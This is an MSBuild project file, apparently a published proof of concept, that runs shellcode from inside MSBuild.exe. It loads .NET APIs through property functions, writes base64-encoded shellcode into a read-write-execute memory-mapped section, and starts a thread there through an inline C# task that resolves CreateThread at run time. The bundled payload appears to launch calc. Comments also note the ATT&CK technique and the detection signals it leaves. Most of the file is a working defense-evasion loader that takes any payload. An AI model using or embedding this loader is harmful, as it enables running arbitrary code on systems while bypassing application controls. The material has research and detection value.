Self Contained MSBuild ShellCode Runner Example - Using a mashup of weird tricks.
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- Call ANY .NET API --> | |
| <!-- | |
| Author: Casey Smith, Twitter: @_subTee | |
| License: BSD 3-Clause | |
| Full Working Details Here: https://www.youtube.com/watch?v=vj_rvLVpqg8 | |
| --> | |
| <!-- set MSBUILDENABLEALLPROPERTYFUNCTIONS=1 --> | |
| <!-- | |
| $env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1 | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe basic.xml | |
| I added a breakpoint prefix here for testing.. | |
| byte[] shellcode = new byte[273] { | |
| 0xcc,0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, | |
| 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, | |
| 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, | |
| 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, | |
| 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, | |
| 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, | |
| 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, | |
| 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, | |
| 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, | |
| 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, | |
| 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, | |
| 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, | |
| 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, | |
| 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, | |
| 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, | |
| 0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, | |
| 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, | |
| 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, | |
| 0x63,0x00 }; | |
| zPxIg+Tw6MAAAABBUUFQUFZIMNJLSJJSYEILUHHII1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgS | |
| <Shellcode>/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=</Shellcode> | |
| --> | |
| <UsingTask TaskName="CreateThreadTask" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll"> | |
| <ParameterGroup> | |
| <ShellcodeAddress ParameterType="System.String" Required="true" /> | |
| <ThreadHandle ParameterType="System.String" Output="true" /> | |
| </ParameterGroup> | |
| <Task> | |
| <Reference Include="System" /> | |
| <Reference Include="System.Runtime.InteropServices" /> | |
| <Code Type="Class" Language="cs"> | |
| <![CDATA[ | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Build.Framework; | |
| using Microsoft.Build.Utilities; | |
| /// <summary> | |
| /// Inline MSBuild task (compiled in-process by CodeTaskFactory, see the enclosing UsingTask) that starts a new thread at the address given in ShellcodeAddress. | |
| /// Nothing here spawns a child process: the thread is created inside MSBuild.exe itself, so the process-level trace a defender sees is MSBuild.exe being launched with this project file (ATT&CK T1127.001, Trusted Developer Utilities: MSBuild). | |
| /// </summary> | |
| public class CreateThreadTask : Task | |
| { | |
| // kernel32 exports are resolved at run time; CreateThread is never declared with [DllImport], only the two resolver functions are. | |
| [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] | |
| static extern IntPtr LoadLibrary(string lpFileName); | |
| [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] | |
| static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); | |
| // Signature of kernel32!CreateThread; the address from GetProcAddress is bound to it via Marshal.GetDelegateForFunctionPointer. | |
| [UnmanagedFunctionPointer(CallingConvention.StdCall)] | |
| delegate IntPtr CreateThreadDelegate( | |
| IntPtr lpThreadAttributes, | |
| UIntPtr dwStackSize, | |
| IntPtr lpStartAddress, | |
| IntPtr lpParameter, | |
| uint dwCreationFlags, | |
| out uint lpThreadId | |
| ); | |
| // Thread start address as bare hexadecimal digits (no "0x" prefix). The Target passes the pointer of the ReadWriteExecute memory-mapped view, formatted with ToString("X"). | |
| [Required] | |
| public string ShellcodeAddress { get; set; } | |
| // Handle returned by CreateThread, formatted as uppercase hex. The task never closes it. | |
| [Output] | |
| public string ThreadHandle { get; set; } | |
| /// <summary> | |
| /// Resolves CreateThread and starts a thread at ShellcodeAddress. | |
| /// Returns false only when kernel32.dll or the CreateThread export cannot be resolved. The handle returned by CreateThread is not compared with IntPtr.Zero, so a failed thread creation still returns true and logs a handle of 0x0. | |
| /// Detection note: the new thread's start address lies in an anonymous memory-mapped section created with ReadWriteExecute, not in any loaded image; that is the "thread start outside a module" condition endpoint thread-creation telemetry is built to surface, and the RWX section creation by MSBuild.exe is itself a strong signal. | |
| /// </summary> | |
| public override bool Execute() | |
| { | |
| IntPtr kernel32 = LoadLibrary("kernel32.dll"); | |
| if (kernel32 == IntPtr.Zero) | |
| { | |
| Log.LogError("Failed to load kernel32.dll"); | |
| return false; | |
| } | |
| IntPtr createThreadAddr = GetProcAddress(kernel32, "CreateThread"); | |
| if (createThreadAddr == IntPtr.Zero) | |
| { | |
| Log.LogError("Failed to get CreateThread address"); | |
| return false; | |
| } | |
| var createThreadDelegate = (CreateThreadDelegate)Marshal.GetDelegateForFunctionPointer( | |
| createThreadAddr, | |
| typeof(CreateThreadDelegate) | |
| ); | |
| // NumberStyles.HexNumber rejects a leading "0x". The parsed value is not checked against the mapped range; any parseable number is used as the start address as-is. | |
| IntPtr shellcodePtr = new IntPtr(long.Parse(ShellcodeAddress, System.Globalization.NumberStyles.HexNumber)); | |
| uint threadId; | |
| // dwCreationFlags = 0: the thread starts running immediately, with the default stack size and no parameter. | |
| IntPtr hThread = createThreadDelegate( | |
| IntPtr.Zero, | |
| UIntPtr.Zero, | |
| shellcodePtr, | |
| IntPtr.Zero, | |
| 0, | |
| out threadId | |
| ); | |
| ThreadHandle = hThread.ToString("X"); | |
| // Logged at High importance so both values show up at MSBuild's default console verbosity. | |
| Log.LogMessage(MessageImportance.High, "Thread Handle: 0x" + ThreadHandle); | |
| Log.LogMessage(MessageImportance.High, "Thread ID: " + threadId.ToString()); | |
| return true; | |
| } | |
| } | |
| ]]> | |
| </Code> | |
| </Task> | |
| </UsingTask> | |
| <Target Name="Hello"> | |
| <Message Text="$([System.Reflection.Assembly]::Load('System.IO'))" /> | |
| <Message Text="$([System.Reflection.Assembly]::Load('System.IO.MemoryMappedFiles'))" /> | |
| <Message Text="$([System.Reflection.Assembly]::Load('System.Runtime.InteropServices'))" /> | |
| <PropertyGroup> | |
| <MappedFileName>1c9360ac-dc0d-4cd8-bf32-c4380855b733</MappedFileName> | |
| <Shellcode>/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=</Shellcode> | |
| <CreateMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::CreateNew($(MappedFileName), $([System.Int64]::Parse(272)),$([System.IO.MemoryMappedFiles.MemoryMappedFileAccess]::ReadWriteExecute)))</CreateMemoryMappedFile> | |
| <WriteToMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::OpenExisting($(MappedFileName), $([System.IO.MemoryMappedFiles.MemoryMappedFileRights]::FullControl)).CreateViewStream().Write($([System.Convert]::FromBase64String($(Shellcode))), 0, 272))</WriteToMemoryMappedFile> | |
| <GetRWXIntPtrMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::OpenExisting($(MappedFileName), $([System.IO.MemoryMappedFiles.MemoryMappedFileRights]::FullControl)).CreateViewStream($([System.Int64]::Parse(0)), $([System.Int64]::Parse(272)), $([System.IO.MemoryMappedFiles.MemoryMappedFileAccess]::ReadWriteExecute)).SafeMemoryMappedViewHandle.DangerousGetHandle().ToString("X"))</GetRWXIntPtrMemoryMappedFile> | |
| <MSBuildPID>$([System.Diagnostics.Process]::GetCurrentProcess().Id)</MSBuildPID> | |
| </PropertyGroup> | |
| <Message Text="$(CreateMemoryMappedFile)" /> | |
| <Message Text="Current MSBuild Process ID: $(MSBuildPID)" Importance="high" /> | |
| <Message Text="$([System.Console]::WriteLine('Attach Debugger'))" /> | |
| <Message Text="$([System.Console]::ReadLine())" /> | |
| <Message Text="Shellcode Address: 0x$(GetRWXIntPtrMemoryMappedFile)" Importance="high" /> | |
| <CreateThreadTask ShellcodeAddress="$(GetRWXIntPtrMemoryMappedFile)"> | |
| <Output TaskParameter="ThreadHandle" PropertyName="ThreadHandleResult" /> | |
| </CreateThreadTask> | |
| <Message Importance="high" Text="Thread created successfully! Handle: 0x$(ThreadHandleResult)" /> | |
| <Message Text="$([System.Console]::ReadLine())" /> | |
| </Target> | |
| </Project> |
| This is a single file that executes shellcode | |
| It's an example of some of the capabilities of MSBuild. | |